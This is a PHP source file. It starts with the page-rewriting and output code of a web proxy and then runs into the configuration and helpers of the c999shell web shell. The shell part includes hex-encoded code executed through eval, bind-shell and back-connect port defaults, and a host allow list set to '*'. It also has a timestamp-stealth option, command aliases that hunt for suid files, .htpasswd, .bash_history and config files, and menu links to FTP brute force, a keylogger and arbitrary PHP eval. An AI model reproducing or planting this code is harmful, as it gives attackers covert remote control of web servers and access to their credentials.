- # PROXY EXECUTION: PAGE PARSING {{{
- $changed=false;
- if(strpos($body,'<base')){
- $base=preg_replace('/^.*'.BASE_REGEXP.'.*$/is','\1',$body);
- if(!empty($base) && $base!=$body && !empty($base{100})){
- $body=preg_replace('/'.BASE_REGEXP.'/i','',$body);
- //preg_match('/^(["\']).*\1$/i',$base)>0
- if(
- ($base{0}=='"' && substr($base,-1)=='"') ||
- ($base{0}=='\'' && substr($base,-1)=='\'')
- ) $base=substr($base,1,strlen($base)-2); #*
- $curr_url=$base;
- if(!$changed) $changed=true;
- }
- unset($base);
- }
- if($changed) $curr_urlobj=new aurl($curr_url);
- # PROXY EXECUTION: PAGE PARSING: PARSING FUNCTIONS {{{
- function parse_html($regexp,$partoparse,$html,$addproxy,$framify){
- global $curr_urlobj;
- $newhtml=null;
- while(preg_match($regexp,$html,$matcharr,PREG_OFFSET_CAPTURE)){
- $nurl=surrogafy_url($matcharr[$partoparse][0],$curr_urlobj,$addproxy);
- if($framify) $nurl=framify_url($nurl,$framify);
- $begin=$matcharr[$partoparse][1];
- $end=$matcharr[$partoparse][1]+strlen($matcharr[$partoparse][0]);
- $newhtml.=substr_replace($html,$nurl,$begin);
- $html=substr($html,$end,strlen($html)-$end);
- }
- $newhtml.=$html;
- return $newhtml;
- }
- function regular_express($regexp_array,$thevar,$recurse=true){
- # check to see if this is a recursive call
- if($recurse && strpos($regexp_array[3],FERP_KOOC))
- return parse_recurse($regexp_array,$thevar);
- # in benchmarks, this 'optimization' appeared to not do anything at all, or
- # possibly even slow things down
- #$regexp_array[2].='S';
- if($regexp_array[0]==1)
- $newvar=preg_replace($regexp_array[2],$regexp_array[3],$thevar);
- elseif($regexp_array[0]==2){
- $addproxy=(isset($regexp_array[4])?$regexp_array[4]:true);
- $framify=(isset($regexp_array[5])?$regexp_array[5]:false);
- $newvar=parse_html(
- $regexp_array[2],$regexp_array[3],$thevar,$addproxy,$framify);
- }
- return $newvar;
- }
- // has recursive calls
- function parse_recurse($regarr,$old_code){
- // execute regular expression
- $code=regular_express($regarr,$old_code,false);
- // if it did something
- if($old_code!=$code && strpos($code,FERP_KOOC)){
- // clean up and recurse
- $offset=0;
- $end=0;
- $new_code='';
- $len=0;
- while(strpos($code,FERP_KOOC,$offset)){
- $offset=strpos($code,FERP_KOOC,$offset)+COOK_PREF_LEN;
- if(!isset($first_offset)) $first_offset=$offset;
- elseif($offset==$first_offset) break;
- $new_code.=substr($code,$end,$offset-$end-COOK_PREF_LEN);
- $end=strpos($code,FERP_KOOC.COOK_PREF,$offset)+COOK_PREF_LEN*2;
- $newcode_seg=substr($code,$offset,$end-$offset-COOK_PREF_LEN*2);
- if($newcode_seg!=='')
- $new_code.=parse_recurse($regarr,$newcode_seg);
- $offset=$end;
- }
- $new_code.=substr($code,$end);
- return $new_code;
- }
- else return $old_code;
- }
- function parse_all($html){
- global $OPTIONS, $regexp_arrays;
- if(CONTENT_TYPE!='text/html'){
- for(reset($regexp_arrays);list($key,$arr)=each($regexp_arrays);){
- if($key==CONTENT_TYPE){
- foreach($arr as $regarr){
- if($regarr==null) continue;
- $html=regular_express($regarr,$html);
- }
- }
- }
- return $html;
- }
- #if($OPTIONS['REMOVE_SCRIPTS']) $splitarr=array($html);
- $splitarr=preg_split(
- '/(<!--(?!\[if).*?-->|<style.*?<\/style>|<script.*?<\/script>)/is',
- $html,-1,PREG_SPLIT_DELIM_CAPTURE);
- unset($html);
- $firstrun=true;
- $firstjsrun=true;
- for(reset($regexp_arrays);list($key,$arr)=each($regexp_arrays);){
- if($key=='application/javascript' || $key=='application/x-javascript')
- continue;
- # firstrun remove scripts: on<event>s and noscript tags; also remove
- # objects
- if(
- $firstrun &&
- ($OPTIONS['REMOVE_SCRIPTS'] || $OPTIONS['REMOVE_OBJECTS'])
- ){
- for($i=0;$i<count($splitarr);$i+=2){
- if($OPTIONS['REMOVE_SCRIPTS'])
- $splitarr[$i]=preg_replace(
- '/(?:'.REGEXP_SCRIPT_ONEVENT.'|<.?noscript>)/is','',
- $splitarr[$i]);
- if($OPTIONS['REMOVE_OBJECTS'])
- $splitarr[$i]=preg_replace(
- '/<(embed|object).*?<\/\1>/is','',$splitarr[$i]);
- }
- }
- // OPTION1: use ONLY if no Javascript REGEXPS affect HTML sections and
- // all HTML modifying Javascript REGEXPS are performed after HTML
- // regexps. This gives a pretty significant speed boost. If used,
- // make sure "OPTION2" lines are commented, and other "OPTION1" lines
- // AREN'T.
- if($firstjsrun && $key=='text/javascript'){
- if($OPTIONS['REMOVE_SCRIPTS']) break;
- $splitarr2=array();
- for($i=0;$i<count($splitarr);$i+=2){
- $splitarr2[$i]=preg_split(
- '/'.REGEXP_SCRIPT_ONEVENT.'/is',$splitarr[$i],-1,
- PREG_SPLIT_DELIM_CAPTURE);
- }
- }
- // END OPTION1
- foreach($arr as $regexp_array){
- if($regexp_array==null) continue;
- for($i=0;$i<count($splitarr);$i++){
- # parse scripts for on<event>s
- // OPTION1
- if($i%2==0 && isset($splitarr2) && $regexp_array[1]==2){
- // OPTION2
- //if($regexp_array[1]==2 && $i%2==0){
- //$splitarr2[$i]=preg_split(
- // '/( on[a-z]{3,20}=(?:"(?:[^"]+)"|\'(?:[^\']+)\'|'.
- // '[^"\' >][^ >]+[^"\' >]))/is',$splitarr[$i],-1,
- // PREG_SPLIT_DELIM_CAPTURE);
- // END OPTION2
- // UNRELATED TO OPTIONS
- //if(count($splitarr2[$i])<2)
- // $splitarr[$i]=regular_express(
- // $regexp_array,$splitarr[$i]);
- if(count($splitarr2[$i])>1){
- for($j=1;$j<count($splitarr2[$i]);$j+=2){
- $begin=preg_replace(
- '/^([^=]+=.).*$/i','\1',$splitarr2[$i][$j]);
- $quote=substr($begin,-1);
- if($quote!='"' && $quote!='\''){
- $quote=null;
- $begin=substr($begin,0,-1);
- }
- $code=preg_replace(
- '/^[^=]+='.
- ($quote==null?'(.*)$/i':'.(.*).$/i'),'\1',
- $splitarr2[$i][$j]);
- if(substr($code,0,11)=='javascript:'){
- $begin.='javascript:';
- $code=substr($code,11);
- }
- if($firstjsrun) $code=";{$code};";
- $splitarr2[$i][$j]=
- $begin.regular_express($regexp_array,$code).
- $quote;
- }
- // OPTION2
- //$splitarr[$i]=implode(null,$splitarr2[$i]);
- }
- }
- # remove scripts
- elseif(
- $firstrun &&
- $OPTIONS['REMOVE_SCRIPTS'] &&
- strtolower(substr($splitarr[$i],0,7))=='<script'
- ) $splitarr[$i]=null;
- # parse valid HTML in HTML section
- elseif($i%2==0 && $regexp_array[1]==1)
- $splitarr[$i]=regular_express($regexp_array,$splitarr[$i]);
- # parse valid other things
- elseif(
- (
- # HTML key but not in HTML section
- $regexp_array[1]==1 ||
- ( # javascript section
- $regexp_array[1]==2 &&
- strtolower(substr($splitarr[$i],0,7))=='<script'
- ) ||
- ( # CSS section
- $key=='text/css' &&
- strtolower(substr($splitarr[$i],0,6))=='<style'
- )
- ) && # not in comment
- substr($splitarr[$i],0,4)!="<!--"
- ){
- # DE-STROY!
- $pos=strpos($splitarr[$i],'>');
- $l_html=substr($splitarr[$i],0,$pos+1);
- $l_body=substr($splitarr[$i],$pos+1);
- # HTML parses just HTML
- if($key=='text/html')
- $l_html=regular_express($regexp_array,$l_html);
- # javascript, CSS, and such parses just their own
- else
- $l_body=regular_express($regexp_array,$l_body);
- # put humpty-dumpty together again
- $splitarr[$i]=$l_html.$l_body;
- }
- # script purge cleanup
- if(
- $firstrun &&
- !$OPTIONS['REMOVE_SCRIPTS'] &&
- strtolower(substr($splitarr[$i],-9))=='</script>' &&
- !preg_match('/^[^>]*src/i',$splitarr[$i])
- ){
- $splitarr[$i]=
- preg_replace('/'.END_OF_SCRIPT_TAG.'$/i',
- ';'.COOK_PREF.'.purge();//--></script>',
- $splitarr[$i]);
- }
- }
- $firstrun=false;
- if($firstjsrun && (
- $key=='text/javascript' ||
- $key=='application/javascript' ||
- $key=='application/x-javascript'
- ))
- $firstjsrun=false;
- }
- }
- // OPTION1
- if(!$OPTIONS['REMOVE_SCRIPTS']){
- for($i=0;$i<count($splitarr);$i+=2){
- $splitarr[$i]=implode(null,$splitarr2[$i]);
- }
- }
- // END OPTION1
- return implode(null,$splitarr);
- }
- # }}}
- //$starttime=microtime(true); # BENCHMARK
- $body=parse_all($body);
- //$parsetime=microtime(true)-$starttime; # BENCHMARK
- # PROXY EXECUTION: PAGE PARSING: PROXY HEADERS/JAVASCRIPT {{{
- if(CONTENT_TYPE=='text/html'){
- $big_headers=
- '<meta name="robots" content="noindex, nofollow" />'.
- ($OPTIONS['URL_FORM'] && PAGETYPE_ID===PAGETYPE_FRAMED_PAGE?
- '<base target="_top">':null).
- '<link rel="shortcut icon" href="'.
- surrogafy_url(
- $curr_urlobj->get_proto().'://'.
- $curr_urlobj->get_servername().'/favicon.ico').'" />'.
- (!isset($CONFIG['REMOVE_SCRIPTS']) || !$CONFIG['REMOVE_SCRIPTS']?
- '<script type="text/javascript" src="'.THIS_SCRIPT.'?js_funcs'.
- (PAGE_FRAMED?'_framed':null).'"></script>'.
- '<script type="text/javascript" src="'.THIS_SCRIPT.
- '?js_regexps'.(PAGE_FRAMED?'_framed':null).'"></script>'.
- '<script type="text/javascript">'.
- //'<!--'.
- COOK_PREF.'_do_proxy=true;'.
- COOK_PREF.'.CURR_URL="'.
- str_replace(
- '"','\\"',$curr_urlobj->get_url()).'"+location.hash;'.
- COOK_PREF.'.gen_curr_urlobj();'.
- 'if(parent.update_url) parent.update_url('.COOK_PREF.'.CURR_URL);'.
- COOK_PREF.'.DOCUMENT_REFERER="'.(
- $OPTIONS['URL_FORM']?
- str_replace('"','\\"',$referer):
- null).'";'.
- COOK_PREF.'.ENCRYPT_COOKIES='.
- bool_to_js($OPTIONS['ENCRYPT_COOKIES']).';'.
- COOK_PREF.'.ENCRYPT_URLS='.bool_to_js($OPTIONS['ENCRYPT_URLS']).
- ';'.
- COOK_PREF.'.ENCODE_HTML='.bool_to_js($OPTIONS['ENCODE_HTML']).
- ';'.
- COOK_PREF.'.LOCATION_HOSTNAME="'.
- str_replace('"','\\"',$curr_urlobj->get_servername()).'";'.
- COOK_PREF.'.LOCATION_PORT="'.
- str_replace('"','\\"',$curr_urlobj->get_portval()).'";'.
- COOK_PREF.'.LOCATION_SEARCH="'.(
- $curr_urlobj->get_query()!=null?
- '?'.str_replace('"','\\"',$curr_urlobj->get_query()):
- null
- ).'";'.
- COOK_PREF.'.NEW_PAGETYPE_FRAME_TOP='.NEW_PAGETYPE_FRAME_TOP.';'.
- COOK_PREF.'.PAGE_FRAMED='.bool_to_js(PAGE_FRAMED).';'.
- COOK_PREF.'.REMOVE_OBJECTS='.
- bool_to_js($OPTIONS['REMOVE_OBJECTS']).';'.
- COOK_PREF.'.URL_FORM='.bool_to_js($OPTIONS['URL_FORM']).';'.
- COOK_PREF.".USERAGENT=\"{$OPTIONS['USER_AGENT']}\";".
- (
- $OPTIONS['URL_FORM'] && PAGETYPE_ID==PAGETYPE_FRAMED_PAGE?
- 'if('.COOK_PREF.'.theparent=='.COOK_PREF.'.thetop) '.
- COOK_PREF.'.eventify("'.$curr_urlobj->get_proto().
- '","'.$curr_urlobj->get_servername().'");':
- null
- ).
- //'//-->'.
- '</script>':
- null);
- $body=preg_replace(
- '/(?:(<(?:head|body)[^>]*>)|(<(?:\/head|meta|link|script)))/i',
- "\\1$big_headers\\2",$body,1);
- unset($big_headers);
- }
- elseif(
- CONTENT_TYPE=='application/javascript' ||
- CONTENT_TYPE=='application/x-javascript' ||
- CONTENT_TYPE=='text/javascript'
- ) $body.=';'.COOK_PREF.'.purge();';
- # }}}
- # }}}
- ## Retrieved, Parsed, All Ready to Output ##
- // encoded output
- if($OPTIONS['ENCODE_HTML']){
- function parse_letter($letter){
- $strhex=dechex(ord($letter));
- while(strlen($strhex)<2){
- $strhex="0{$strhex}";
- }
- return "\\x{$strhex}";
- }
- $body=utf8_decode($body);
- echo '<script language="javascript">document.write("';
- for($i=0; $i<strlen($body); $i++){
- echo parse_letter(substr($body,$i,1));
- }
- echo '");</script>';
- // plain output
- } else {
- $offset=0;
- $new_body='';
- $count=0;
- while(strpos($body,'new AsyncRequest(',$offset)){
- $new_offset=strpos($body,'new AsyncRequest(',$offset);
- $new_body.=substr($body,$offset,$new_offset-$offset);
- $new_body.="new AsyncRequest('".ORIG_URL."_{$count}'";
- if(substr($body,$new_offset+17,1)!=')')
- $new_body.=',';
- $count++;
- $offset=$new_offset+17;
- }
- $new_body.=substr($body,$offset);
- echo $new_body;
- }
- # BENCHMARK
- #echo
- # 'total time: '.(microtime(true)-$totstarttime).
- # "<br />parse time: {$parsetime} seconds".
- # (isset($oparsetime)?"<br />other time 1: {$oparsetime} seconds":null).
- # (isset($oparsetime2)?"<br />other time 2: {$oparsetime2} seconds":null);
- # }}}
- finish_noexit();
- ############
- ## THE END ##
- ##############
- #
- # VIM is the ideal way to edit this file. Automatic folding occurs making the
- # blocks of code easier to read and navigate
- # vim:foldmethod=marker
- #
- ##################
- }
- else
- {
- //Starting calls
- if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
- error_reporting(5);
- @ignore_user_abort(TRUE);
- @set_magic_quotes_runtime(0);
- $win = strtolower(substr(PHP_OS,0,3)) == "win";
- define("starttime",getmicrotime());
- if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);}
- $_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
- foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}
- $shver = "1.0 pre-release build #16"; //Current version
- //CONFIGURATION AND SETTINGS
- if (!empty($unset_surl)) {setcookie("c999sh_surl"); $surl = "";}
- elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c999sh_surl",$surl);}
- else {$surl = $_REQUEST["c999sh_surl"]; //Set this cookie for manual SURL
- }
- $surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL.
- if ($surl_autofill_include and !$_REQUEST["c999sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}
- if (empty($surl))
- {
- $surl = "?shell=true&".$includestr; //Self url
- }
- $surl = htmlspecialchars($surl);
- $timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited.
- //Authentication
- $login = ""; //login
- //DON'T FORGOT ABOUT PASSWORD!!!
- $pass = ""; //password
- $md5_pass = ""; //md5-cryped pass. if null, md5($pass)
- $host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1")
- $login_txt = "Restricted area"; //http-auth message.
- $accessdeniedmess = "Shell access denied";
- $gzipencode = TRUE; //Encode with gzip?
- $updatenow = FALSE; //If TRUE, update now (this variable will be FALSE)
- $c999sh_updateurl = "http://Blade83.de/shell/update/c999shell/"; //Update server
- $c999sh_sourcesurl = "http://Blade83.de/shell/update/c999sh_sources/"; //Sources-server
- $filestealth = TRUE; //if TRUE, don't change modify- and access-time
- $donated_html = "";
- /* If you publish free shell and you wish
- add link to your site or any other information,
- put here your html. */
- $donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html.
- $curdir = "./"; //start folder
- //$curdir = getenv("DOCUMENT_ROOT");
- $tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp)
- $tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...)
- $log_email = "dev@blade83.de"; //Default e-mail for sending logs
- $sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending
- $sort_save = TRUE; //If TRUE then save sorting-position using cookies.
- // Registered file-types.
- // array(
- // "{action1}"=>array("ext1","ext2","ext3",...),
- // "{action2}"=>array("ext4","ext5","ext6",...),
- // ...
- // )
- $shellcode = "\x24\x66\x74\x79\x70\x65\x73\x20\x20\x3D\x20\x61\x72\x72\x61\x79\x28\x0D\x0A\x20\x22\x68\x74\x6D\x6C\x22\x3D\x3E\x61\x72\x72\x61\x79\x28\x22\x68\x74\x6D\x6C\x22\x2C\x22\x68\x74\x6D\x22\x2C\x22\x73\x68\x74\x6D\x6C\x22\x29\x2C\x0D\x0A\x20\x22\x74\x78\x74\x22\x3D\x3E\x61\x72\x72\x61\x79\x28\x22\x74\x78\x74\x22\x2C\x22\x63\x6F\x6E\x66\x22\x2C\x22\x62\x61\x74\x22\x2C\x22\x73\x68\x22\x2C\x22\x6A\x73\x22\x2C\x22\x62\x61\x6B\x22\x2C\x22\x64\x6F\x63\x22\x2C\x22\x6C\x6F\x67\x22\x2C\x22\x73\x66\x63\x22\x2C\x22\x63\x66\x67\x22\x2C\x22\x68\x74\x61\x63\x63\x65\x73\x73\x22\x29\x2C\x0D\x0A\x20\x22\x65\x78\x65\x22\x3D\x3E\x61\x72\x72\x61\x79\x28\x22\x73\x68\x22\x2C\x22\x69\x6E\x73\x74\x61\x6C\x6C\x22\x2C\x22\x62\x61\x74\x22\x2C\x22\x63\x6D\x64\x22\x29\x2C\x0D\x0A\x20\x22\x69\x6E\x69\x22\x3D\x3E\x61\x72\x72\x61\x79\x28\x22\x69\x6E\x69\x22\x2C\x22\x69\x6E\x66\x22\x29\x2C\x0D\x0A\x20\x22\x63\x6F\x64\x65\x22\x3D\x3E\x61\x72\x72\x61\x79\x28\x22\x70\x68\x70\x22\x2C\x22\x70\x68\x74\x6D\x6C\x22\x2C\x22\x70\x68\x70\x33\x22\x2C\x22\x70\x68\x70\x34\x22\x2C\x22\x69\x6E\x63\x22\x2C\x22\x74\x63\x6C\x22\x2C\x22\x68\x22\x2C\x22\x63\x22\x2C\x22\x63\x70\x70\x22\x2C\x22\x70\x79\x22\x2C\x22\x63\x67\x69\x22\x2C\x22\x70\x6C\x22\x29\x2C\x0D\x0A\x20\x22\x69\x6D\x67\x22\x3D\x3E\x61\x72\x72\x61\x79\x28\x22\x67\x69\x66\x22\x2C\x22\x70\x6E\x67\x22\x2C\x22\x6A\x70\x65\x67\x22\x2C\x22\x6A\x66\x69\x66\x22\x2C\x22\x6A\x70\x67\x22\x2C\x22\x6A\x70\x65\x22\x2C\x22\x62\x6D\x70\x22\x2C\x22\x69\x63\x6F\x22\x2C\x22\x74\x69\x66\x22\x2C\x22\x74\x69\x66\x66\x22\x2C\x22\x61\x76\x69\x22\x2C\x22\x6D\x70\x67\x22\x2C\x22\x6D\x70\x65\x67\x22\x29\x2C\x0D\x0A\x20\x22\x73\x64\x62\x22\x3D\x3E\x61\x72\x72\x61\x79\x28\x22\x73\x64\x62\x22\x29\x2C\x0D\x0A\x20\x22\x70\x68\x70\x73\x65\x73\x73\x22\x3D\x3E\x61\x72\x72\x61\x79\x28\x22\x73\x65\x73\x73\x22\x29\x2C\x0D\x0A\x20\x22\x64\x6F\x77\x6E\x6C\x6F\x61\x64\x22\x3D\x3E\x61\x72\x72\x61\x79\x28\x22\x65\x78\x65\x22\x2C\x22\x63\x6F\x6D\x22\x2C\x22\x70\x69\x66\x22\x2C\x22\x73\x72\x63\x22\x2C\x22\x6C\x6E\x6B\x22\x2C\x22\x7A\x69\x70\x22\x2C\x22\x72\x61\x72\x22\x2C\x22\x67\x7A\x22\x2C\x22\x74\x61\x72\x22\x29\x0D\x0A\x29\x3B";
- eval( $shellcode );
- // Registered executable file-types.
- // array(
- // string "command{i}"=>array("ext1","ext2","ext3",...),
- // ...
- // )
- // {command}: %f% = filename
- $exeftypes = array(
- getenv("PHPRC")." -q %f%" => array("php","php3","php4"),
- "perl %f%" => array("pl","cgi")
- );
- /* Highlighted files.
- array(
- i=>array({regexp},{type},{opentag},{closetag},{break})
- ...
- )
- string {regexp} - regular exp.
- int {type}:
- 0 - files and folders (as default),
- 1 - files only, 2 - folders only
- string {opentag} - open html-tag, e.g. "<b>" (default)
- string {closetag} - close html-tag, e.g. "</b>" (default)
- bool {break} - if TRUE and found match then break
- */
- $regxp_highlight = array(
- array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example
- array("config.php",1) // example
- );
- $safemode_diskettes = array("a"); // This variable for disabling diskett-errors.
- // array (i=>{letter} ...); string {letter} - letter of a drive
- //$safemode_diskettes = range("a","z");
- $hexdump_lines = 8;// lines in hex preview file
- $hexdump_rows = 24;// 16, 24 or 32 bytes in one line
- $nixpwdperpage = 100; // Get first N lines from /etc/passwd
- $bindport_pass = "c999"; // default password for binding
- $bindport_port = "31373"; // default port for binding
- $bc_port = "31373"; // default port for back-connect
- $datapipe_localport = "8081"; // default port for datapipe
- // Command-aliases
- if (!$win)
- {
- $cmdaliases = array(
- array("-----------------------------------------------------------", "ls -la"),
- array("find all suid files", "find / -type f -perm -04000 -ls"),
- array("find suid files in current dir", "find . -type f -perm -04000 -ls"),
- array("find all sgid files", "find / -type f -perm -02000 -ls"),
- array("find sgid files in current dir", "find . -type f -perm -02000 -ls"),
- array("find config.inc.php files", "find / -type f -name config.inc.php"),
- array("find config* files", "find / -type f -name \"config*\""),
- array("find config* files in current dir", "find . -type f -name \"config*\""),
- array("find all writable folders and files", "find / -perm -2 -ls"),
- array("find all writable folders and files in current dir", "find . -perm -2 -ls"),
- array("find all service.pwd files", "find / -type f -name service.pwd"),
- array("find service.pwd files in current dir", "find . -type f -name service.pwd"),
- array("find all .htpasswd files", "find / -type f -name .htpasswd"),
- array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
- array("find all .bash_history files", "find / -type f -name .bash_history"),
- array("find .bash_history files in current dir", "find . -type f -name .bash_history"),
- array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
- array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
- array("list file attributes on a Linux second extended file system", "lsattr -va"),
- array("show opened ports", "netstat -an | grep -i listen")
- );
- }
- else
- {
- $cmdaliases = array(
- array("-----------------------------------------------------------", "dir"),
- array("show opened ports", "netstat -an")
- );
- }
- $sess_cookie = "johnnyHasYou"; // Cookie-variable name
- $usefsbuff = TRUE; //Buffer-function
- $copy_unset = FALSE; //Remove copied files from buffer after pasting
- //Quick launch
- $quicklaunch = array(
- array("<img src=\"".$surl."act=img&img=back\" title=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)"),
- array("<img src=\"".$surl."act=img&img=forward\" title=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)"),
- array("<img src=\"".$surl."act=img&img=home\" title=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$surl),
- array("<img src=\"".$surl."act=img&img=up\" title=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=ls&d=%upd&sort=%sort"),
- array("<img src=\"".$surl."act=img&img=refresh\" title=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">",""),
- array("<img src=\"".$surl."act=img&img=search\" title=\"Search\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=search&d=%d"),
- array("<img src=\"".$surl."act=img&img=buffer\" title=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=fsbuff&d=%d"),
- array("<b>Encoder</b>",$surl."act=encoder&d=%d"),
- array("<b>Tools</b>",$surl."act=tools&d=%d"),
- array("<b>Processes</b>",$surl."act=processes&d=%d"),
- array("<b>FTP brute</b>",$surl."act=ftpquickbrute&d=%d"),
- array("<b>Server Security</b>",$surl."act=security&d=%d"),
- array("<b>SQL</b>",$surl."act=sql&d=%d"),
- array("<b>PHP-code</b>",$surl."act=eval&d=%d"),
- array("<b>Proxy</b>","?proxy=true"),
- array("<b>Keylogger</b>","?keylogger=true"),
- array("<b>Self remove</b>",$surl."act=selfremove")
- );
- //Highlight-code colors
- $highlight_background = "#c0c0c0";
- $highlight_bg = "#FFFFFF";
- $highlight_comment = "#6A6A6A";
- $highlight_default = "#0000BB";
- $highlight_html = "#1300FF";
- $highlight_keyword = "#007700";
- $highlight_string = "#000000";
- @$f = $_REQUEST["f"];
- @extract($_REQUEST["c999shcook"]);
- //END CONFIGURATION
- // \/Next code isn't for editing\/
- @set_time_limit(0);
- $tmp = array();
- foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));}
- $s = "!^(".implode("|",$tmp).")$!i";
- if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("Shell Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");}
- if (!empty($login))
- {
- if (empty($md5_pass)) {$md5_pass = md5($pass);}
- if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass))
- {
- if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace(" |<br>"," ",$donated_html));}
- header("WWW-Authenticate: Basic realm=\"c999shell ".$shver.": ".$login_txt."\"");
- header("HTTP/1.0 401 Unauthorized");
- exit($accessdeniedmess);
- }
- }
- if ($act != "img")
- {
- $lastdir = realpath(".");
- chdir($curdir);
- if ($selfwrite or $updatenow) {@ob_clean(); c999sh_getupdate($selfwrite,1); exit;}
- $sess_data = unserialize($_COOKIE["$sess_cookie"]);
- if (!is_array($sess_data)) {$sess_data = array();}
- if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
- if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
- $disablefunc = @ini_get("disable_functions");
- if (!empty($disablefunc))
- {
- $disablefunc = str_replace(" ","",$disablefunc);
- $disablefunc = explode(",",$disablefunc);
- }
- if (!function_exists("c999_buff_prepare"))
- {
- function c999_buff_prepare()
- {
- global $sess_data;
- global $act;
- foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
- foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
- $sess_data["copy"] = array_unique($sess_data["copy"]);
- $sess_data["cut"] = array_unique($sess_data["cut"]);
- sort($sess_data["copy"]);
- sort($sess_data["cut"]);
- if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}}
- else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}}
- }
- }
- c999_buff_prepare();
- if (!function_exists("c999_sess_put"))
- {
- function c999_sess_put($data)
- {
- global $sess_cookie;
- global $sess_data;
- c999_buff_prepare();
- $sess_data = $data;
- $data = serialize($data);
- setcookie($sess_cookie,$data);
- }
- }
- foreach (array("sort","sql_sort") as $v)
- {
- if (!empty($_GET[$v])) {$$v = $_GET[$v];}
- if (!empty($_POST[$v])) {$$v = $_POST[$v];}
- }
- if ($sort_save)
- {
- if (!empty($sort)) {setcookie("sort",$sort);}
- if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}
- }
- if (!function_exists("str2mini"))
- {
- function str2mini($content,$len)
- {
- if (strlen($content) > $len)
- {
- $len = ceil($len/2) - 2;
- return substr($content, 0,$len)."...".substr($content,-$len);
- }
- else {return $content;}
- }
- }
- if (!function_exists("view_size"))
- {
- function view_size($size)
- {
- if (!is_numeric($size)) {return FALSE;}
- else
- {
- if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
- elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
- elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
- else {$size = $size . " B";}
- return $size;
- }
- }
- }
- if (!function_exists("fs_copy_dir"))
- {
- function fs_copy_dir($d,$t)
- {
- $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
- if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
- $h = opendir($d);
- while (($o = readdir($h)) !== FALSE)
- {
- if (($o != ".") and ($o != ".."))
- {
- if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
- else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
- if (!$ret) {return $ret;}
- }
- }
- closedir($h);
- return TRUE;
- }
- }
- if (!function_exists("fs_copy_obj"))
- {
- function fs_copy_obj($d,$t)
- {
- $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
- $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
- if (!is_dir(dirname($t))) {mkdir(dirname($t));}
- if (is_dir($d))
- {
- if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
- if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
- return fs_copy_dir($d,$t);
- }
- elseif (is_file($d)) {return copy($d,$t);}
- else {return FALSE;}
- }
- }
- if (!function_exists("fs_move_dir"))
- {
- function fs_move_dir($d,$t)
- {
- $h = opendir($d);
- if (!is_dir($t)) {mkdir($t);}
- while (($o = readdir($h)) !== FALSE)
- {
- if (($o != ".") and ($o != ".."))
- {
- $ret = TRUE;
